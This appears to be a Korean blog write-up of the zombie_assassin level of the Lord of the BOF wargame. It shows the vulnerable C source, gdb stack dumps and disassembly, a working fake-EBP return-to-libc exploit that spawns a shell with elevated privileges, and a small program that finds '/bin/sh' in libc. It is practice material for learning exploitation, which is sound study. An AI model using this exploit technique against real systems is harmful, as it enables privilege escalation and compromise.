
오마이갓 fake ebp.. you are like twins with fpo omg why


참고한 자료들:

http://sangu1ne.tistory.com/9 <<-여기 Sanguine형 블러그 여기 롸잇업 짱임여! 롸잇업 뿐만아니라 그냥 짱짱

http://1tchy.tistory.com/entry/fake-ebp <<-간지해커 잇치형의 블러그! 여기 역시 롸잇업 짱임!

이런분들 사이에 끼어 살다니 영광이빈다..

&&... cd80 ㅎ ㄳㄳ

검색기록 날리고 고정된 탭들역시 다 날아가서.. 후.. 더 올릴 수는 없지만 크롬 제발 최근 탭 이거 좀 늘려줬으면 좋겠네요..


[assassin@localhost assassin]$ ls

zombie_assassin  zombie_assassin.c

[assassin@localhost assassin]$ cat zombie_assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - zombie_assassin

        - FEBP

*/


#include <stdio.h>

#include <stdlib.h>


/*
 * Challenge entry point, written K&R-style: implicit int return type, and
 * strncpy is called without #include <string.h>, so it is implicitly declared.
 *
 * argv[1] is copied into a 40-byte stack buffer with a 48-byte bound, so the
 * last 8 bytes of the copy land on the saved frame pointer and the saved
 * return address (the disassembly above places buffer at ebp-0x28, directly
 * below them). The two single-byte checks on argv[1][47] only filter the top
 * byte of the word that overwrites the return address; they do not make the
 * copy itself safe.
 */
main(int argc, char *argv[])

{

        char buffer[40];        // 40 bytes at ebp-0x28; the 48-byte copy below overruns it by 8


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // argv[1][47] is the most significant byte of the dword that lands on the
        // saved return address. 0xbf rejects stack addresses (0xbfffxxxx, as seen
        // in the gdb dump above).
        // NOTE(review): argv[1][47] is read without checking the argument's length,
        // so an argv[1] shorter than 48 bytes makes this an out-of-bounds read.
        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }


        // 0x40 rejects shared-library addresses (0x40xxxxxx, where libc is mapped
        // on this host; e.g. system is shown at 0x40058ae0 above).
        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }


        // strncpy instead of strcpy!
        // The bound (48) exceeds sizeof(buffer) (40) by 8 bytes, overwriting the
        // saved ebp and the return address. strncpy also leaves buffer without a
        // terminating NUL when argv[1] is 48 bytes or longer, so the printf below
        // can read past the end of buffer. A safe copy would bound by
        // sizeof(buffer) - 1 and NUL-terminate explicitly.

        strncpy(buffer, argv[1], 48);

        printf("%s\n", buffer);

}


[assassin@localhost assassin]$ cp zombie_assassin newbie_assassin

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print  "\x90"x48'`



Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) x/40wx $esp-40

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0x90909090      0x90909090      0x90909090      0x90909090 //훼이크(?)

0xbffffad8:     0x90909090      0x90909090      0x00000002      0xbffffb24

0xbffffae8:     0xbffffb30      0x40013868      0x00000002      0x08048390

0xbffffaf8:     0x00000000      0x080483b1      0x08048440      0x00000002

0xbffffb08:     0xbffffb24      0x080482e4      0x0804851c      0x4000ae60

0xbffffb18:     0xbffffb1c      0x40013e90      0x00000002      0xbffffc16

0xbffffb28:     0xbffffc28      0x00000000      0xbffffc59      0xbffffc6c

0xbffffb38:     0xbffffc84      0xbffffca3      0xbffffcc5      0xbffffcd3

0xbffffb48:     0xbffffe96      0xbffffeb5      0xbffffed3      0xbffffee8

(gdb) x/40wx $esp-80

0xbffffa90:     0x40106980      0x0804857e      0xbffffab0      0x401081ec

0xbffffaa0:     0xbffffad8      0x080484dc      0x0804857e      0xbffffab0

0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae0:     0x00000002      0xbffffb24      0xbffffb30      0x40013868

0xbffffaf0:     0x00000002      0x08048390      0x00000000      0x080483b1

0xbffffb00:     0x08048440      0x00000002      0xbffffb24      0x080482e4

0xbffffb10:     0x0804851c      0x4000ae60      0xbffffb1c      0x40013e90

0xbffffb20:     0x00000002      0xbffffc16      0xbffffc28      0x00000000

(gdb) q

[assassin@localhost assassin]$ payload= buffer[dummy][system addr][dummy][binsh][leftover nop] sfp[buffer addr] ret[leaveret]

bash2: buffer[system: command not found


[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

[assassin@localhost assassin]$ clear


[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048446

(gdb) r

Starting program: /home/assassin/newbie_assassin


Breakpoint 1, 0x8048446 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %esp,%ebp

0x8048443 <main+3>:     sub    $0x28,%esp

0x8048446 <main+6>:     cmpl   $0x1,0x8(%ebp)

0x804844a <main+10>:    jg     0x8048463 <main+35>

0x804844c <main+12>:    push   $0x8048540

0x8048451 <main+17>:    call   0x8048354 <printf>

0x8048456 <main+22>:    add    $0x4,%esp

0x8048459 <main+25>:    push   $0x0

0x804845b <main+27>:    call   0x8048364 <exit>

0x8048460 <main+32>:    add    $0x4,%esp

0x8048463 <main+35>:    mov    0xc(%ebp),%eax

0x8048466 <main+38>:    add    $0x4,%eax

0x8048469 <main+41>:    mov    (%eax),%edx

0x804846b <main+43>:    add    $0x2f,%edx

0x804846e <main+46>:    cmpb   $0xbf,(%edx)

0x8048471 <main+49>:    jne    0x8048490 <main+80>

0x8048473 <main+51>:    push   $0x804854c

0x8048478 <main+56>:    call   0x8048354 <printf>

0x804847d <main+61>:    add    $0x4,%esp

0x8048480 <main+64>:    push   $0x0

0x8048482 <main+66>:    call   0x8048364 <exit>

0x8048487 <main+71>:    add    $0x4,%esp

0x804848a <main+74>:    lea    0x0(%esi),%esi

0x8048490 <main+80>:    mov    0xc(%ebp),%eax

0x8048493 <main+83>:    add    $0x4,%eax

0x8048496 <main+86>:    mov    (%eax),%edx

0x8048498 <main+88>:    add    $0x2f,%edx

0x804849b <main+91>:    cmpb   $0x40,(%edx)

0x804849e <main+94>:    jne    0x80484b7 <main+119>

0x80484a0 <main+96>:    push   $0x8048561

0x80484a5 <main+101>:   call   0x8048354 <printf>

0x80484aa <main+106>:   add    $0x4,%esp

0x80484ad <main+109>:   push   $0x0

0x80484af <main+111>:   call   0x8048364 <exit>

0x80484b4 <main+116>:   add    $0x4,%esp

---Type <return> to continue, or q <return> to quit---

0x80484b7 <main+119>:   push   $0x30

0x80484b9 <main+121>:   mov    0xc(%ebp),%eax

0x80484bc <main+124>:   add    $0x4,%eax

0x80484bf <main+127>:   mov    (%eax),%edx

0x80484c1 <main+129>:   push   %edx

0x80484c2 <main+130>:   lea    0xffffffd8(%ebp),%eax

0x80484c5 <main+133>:   push   %eax

0x80484c6 <main+134>:   call   0x8048374 <strncpy>

0x80484cb <main+139>:   add    $0xc,%esp

0x80484ce <main+142>:   lea    0xffffffd8(%ebp),%eax

0x80484d1 <main+145>:   push   %eax

0x80484d2 <main+146>:   push   $0x804857e

0x80484d7 <main+151>:   call   0x8048354 <printf>

0x80484dc <main+156>:   add    $0x8,%esp

0x80484df <main+159>:   leave

0x80484e0 <main+160>:   ret


End of assembler dump.


[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ my-pass

euid = 516

근데 이상한거 하나 잘못하다가 bash2 무작정 많이 돌려놨거든여 그래서 ps하면 bash2가 3개정도 돌아가고 있었는데 그러면 공격이 안되더라고여 (다른 세션으로 했는데 공격되는데 막 내가쓰는건 안댐)그래서 다 bash까지 exit하고서 다시 bash2하니까 되네요 왜그럼 (페이로드에 스택 주소 0xbffffab0이 하드코딩되어 있어서, 셸이 여러 겹 떠 있으면 환경 변수가 달라져 스택 배치가 밀리고 그 주소가 더 이상 맞지 않았을 가능성이 큽니다.)

그리고 예전에 libc에서 /bin/sh문자열 찾는 소스 구해서 여따가 썼는데.. 사이트 아마 저장해뒀을테니까 찾아볼께요 이번에 다시 완전히 처음부터 해보려고 소스던 로그던 다날려서 못찾음..ㄸㄹㄹ

그나저나 하.. 어렵다! 두단계남았다! 배고프다! 2시다!!! 으랴


+)로그 안날아갔다고 합니다 똑똑한 토끼를 칭찬해주세여 하지만 또 올릴 필요는 없으니 /bin/sh찾는 소스만 올리겠습니다

-해당 소스-

[assassin@localhost assassin]$ cat foo.c

/*
 * One-off helper: scans memory byte by byte from a hard-coded start address
 * and prints the address of the first occurrence of the string "/bin/sh".
 * Written with an implicit-int main and without #include <stdio.h> or
 * <string.h>, so it relies on implicit declarations; newer compilers warn on
 * or reject this.
 */
main(){

        char *p;


        // Hard-coded start address, assigned int-to-pointer without a cast.
        // NOTE(review): 0x40xxxxxx is where the gdb output above shows the shared
        // libraries mapped on this host; the value is system-specific.
        p = 0x4002c000;

        // No upper bound: if no match is found before the end of the mapped
        // region, the read of *p faults (SIGSEGV) instead of terminating cleanly.
        while (1) {

                // advance p to the byte after the next '/' (empty loop body is intentional)
                while (*p++ != '/') ;

                // p-1 points at that '/'; compare the NUL-terminated string from there
                if (strcmp(p-1, "/bin/sh") == 0) {

                        printf("0x%08x\n", p-1);        // prints the pointer via %x (pointer-sized on this 32-bit target)

                        return 0;

                }

        }

}

출처는 <http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>여기서 찾았습니다.


